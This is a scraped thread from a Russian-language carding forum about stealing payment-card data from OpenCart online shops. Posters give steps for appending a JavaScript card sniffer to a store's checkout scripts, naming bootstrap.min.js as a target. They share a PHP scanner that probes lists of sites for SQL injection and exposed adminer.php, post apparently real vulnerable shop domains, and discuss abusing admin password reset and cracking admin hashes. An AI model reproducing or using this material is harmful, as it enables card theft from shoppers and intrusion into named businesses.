• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Добываем CC из шопов.

Отслеживать
hits сказал(а):
дабы не плодить темы,подскажите как поставить сниффер через админку,через шел та понятно а вот через админку чет не могу понять,версия 2 и первая опенкарта,за ранее благодарю за помощь!
если не сложно , можно в пм или прям тут в теме , дать ссылки как поставить через шел снифф именно в опенкарт.
Заранее спасибо кто откликнится .
 
Пожалуйста, обратите внимание, что пользователь заблокирован
mayone сказал(а):
если не сложно , можно в пм или прям тут в теме , дать ссылки как поставить через шел снифф именно в опенкарт.
Заранее спасибо кто откликнится .
Смотришь страницу оплаты ( view-source: )
Смотришь какие JS фаилы подключаются во время ввода нужных тебе данных. ( <script src="/main.js"> )
Проверяешь есть ли права на правку этих фаилов.
Дописываешь в один из них сниффер.

Вот тут достаточно много свежей (и не очень) инфы: https://xss.pro/threads/80413/post-558805
Ни разу не встречал залоченный
/upload/catalog/view/javascript/bootstrap/js/bootstrap.min.js
Обычно достаточно просто поставить туда, но я бы тебя предостерег от установки на всех доступах в одно и то-же место.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Что именно? Запустить скрипт из первого поста? Реально. PHP5 + Curl.

Note: Note to Win32 Users

In order to enable this module on a Windows environment, libeay32.dll and ssleay32.dll, or, as of OpenSSL 1.1 libcrypto-*.dll and libssl-*.dll, must be present in your PATH. Also libssh2.dll must be present in your PATH.

You don't need libcurl.dll from the cURL site.
www.php.net

PHP: Installation - Manual

Installation
www.php.net www.php.net
 
grader сказал(а):
Да я собственно тут, тема разумеется рабочая. Не могу восстановить старый аккаунт. Упростил максимально код. На данном этапе публично могу выложить только в формате чекера.

Обновление:


В приватной версии:



PHP: 
<?php

/*   opencart security tool
.------..------..------..------.
|O.--. ||C.--. ||S.--. ||T.--. |
| :/\: || :/\: || :/\: || :/\: |
| :\/: || :\/: || :\/: || (__) |
| '--'O|| '--'C|| '--'S|| '--'T|
`------'`------'`------'`------'
* public version
*/


$adminer = array("url" => "/adminer.php","true" => '?file=favicon.ico');
$manufacturer = array("url" => "/index.php?route=product/manufacturer/info&manufacturer_id='", "true" => "syntax");
$product = array("url" => "/index.php?route=product/product&path=4_16&product_id=431'", "true" => "syntax;");
$search = array("url" => "/index.php?route=product/search&tag='", "true" => "syntax;");
$seo = array("url" => "/'", "true" => "syntax;");
$enquiry = array("url" => "/index.php?route=information/contact&enquiry='", "true" => "syntax;");
$journal3 = array("url" => "/index.php?route=journal3/product&product_id='", "true" => "syntax;");
$pav = array("url" => "/index.php?route=pavblog/blog&blog_id=160'", "true" => "syntax;");
$blog_list = array("url" => "/index.php?route=product/blog_list&blogger_id=11'", "true" => "syntax;");
$blog = array("url" => "/index.php?route=blog/blog&blog_id=140'", "true" => "syntax;");


function curl_me($url){
$curl = curl_init();
if (!$curl) die("Couldn't initialize a cURL handle");
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_USERAGENT, 'WithLoveFromXSS.is'); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_FAILONERROR, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($curl, CURLOPT_TIMEOUT, 5);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
$html = curl_exec($curl);
return $html;

}


$list = file('wow.txt');

foreach($list as $target){

$target = trim($target);
//print '=> ' .$target. PHP_EOL;
if(stripos(curl_me($target.$adminer['url']), $adminer['true']) !== false) { print $target.$adminer['url']. PHP_EOL;}
if(stripos(curl_me($target.$manufacturer['url']), $manufacturer['true']) !== false) { print $target.$manufacturer['url']. PHP_EOL;}
if(stripos(curl_me($target.$product['url']), $product['true']) !== false) { print $target.$product['url']. PHP_EOL;}
if(stripos(curl_me($target.$search['url']), $search['true']) !== false) { print $target.$search['url']. PHP_EOL;}
if(stripos(curl_me($target.$seo['url']), $seo['true']) !== false) { print $target.$seo['url']. PHP_EOL;}
if(stripos(curl_me($target.$enquiry['url']), $enquiry['true']) !== false) {print $target.$enquiry['url']. PHP_EOL;}
if(stripos(curl_me($target.$journal3['url']), $journal3['true']) !== false) { print $target.$journal3['url']. PHP_EOL;}
if(stripos(curl_me($target.$pav['url']), $pav['true']) !== false) { print $target.$pav['url']. PHP_EOL;}
if(stripos(curl_me($target.$blog_list['url']), $blog_list['true']) !== false) { print $target.$blog_list['url']. PHP_EOL;}
if(stripos(curl_me($target.$blog['url']), $blog['true']) !== false) { print $target.$blog['url']. PHP_EOL;}

}


Ну и по традиции немного результатов, есть с формами :)

Код: 
http://hq-tech.com//index.php?route=product/product&path=4_16&product_id=431%27
tillsonburggunshop.com/adminer.php
xmasdvdset.com/'
leebhardnesstesters.com/adminer.php
sec-on.com/admin/:RESET: https://sec-on.com/index.php?route=product/manufacturer/info&manufacturer_id='
aqqfa.com/admin/:RESET: https://aqqfa.com/index.php?route=product/manufacturer/info&manufacturer_id='
Пдскажите плиз, давно еще парсил опенкарт , сопилось большое количество , как будет ефективней сделать? напарсить новые линки с этими уязвимыми одей, или обрезать добены и пропустить через этот чекер?

Помогите пожалуйста , запустить этот паблик чекер.
Вот тут расписывали, и все получилось https://xss.pro/threads/30928/post-269971 . Но как этот чекер поставить? Помогите пожалуйста, нужно домены свои прочекать на эти 0day , ну и и все что там в паблик чекере.
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Что именно у тебя не получается?
 
PrikolBullet сказал(а):
Был не прав, ресет и правда работает, дело было в баге OpenCart когда у меня отображалось forgiben password при значении config_password 0. В PoC AdminerRead указывается, что нужны креды от адмайнера, без кредов не получится, правильно понимаю?
хай, получилось вернуть кнопку ? У меня другая ситуация , админ поменял обратно пасс , и кнопка пропала. Есть какой то другой способ получить доступ, потому что изначально там пасс был бешенный, а счас наверное еще хуже. Скуля работает.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
mayone сказал(а):
хай, получилось вернуть кнопку ? У меня другая ситуация , админ поменял обратно пасс , и кнопка пропала. Есть какой то другой способ получить доступ, потому что изначально там пасс был бешенный, а счас наверное еще хуже. Скуля работает.
Это не сам пас, а его хеш в бд. Кнопку ты не вернёшь, сработала встроенная защита или админ убрал галочку с reset password в настройках, где в бд config_password в oc_setting сменился с 1 на 0
 
PrikolBullet сказал(а):
Это не сам пас, а его хеш в бд. Кнопку ты не вернёшь, сработала встроенная защита или админ убрал галочку с reset password в настройках, где в бд config_password в oc_setting сменился с 1 на 0
)))) та понятно что хеш, просто его сломать не смогли, в платном разделе , я это имею в виду, что он там наверное еще хуже пас сделал, просто шоп хороший
 
Пожалуйста, обратите внимание, что пользователь заблокирован
mayone сказал(а):
)))) та понятно что хеш, просто его сломать не смогли, в платном разделе , я это имею в виду, что он там наверное еще хуже пас сделал, просто шоп хороший
Ты указывал что хеш с опенкарта? Там другие настройки, чекай гит Джона риппера
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх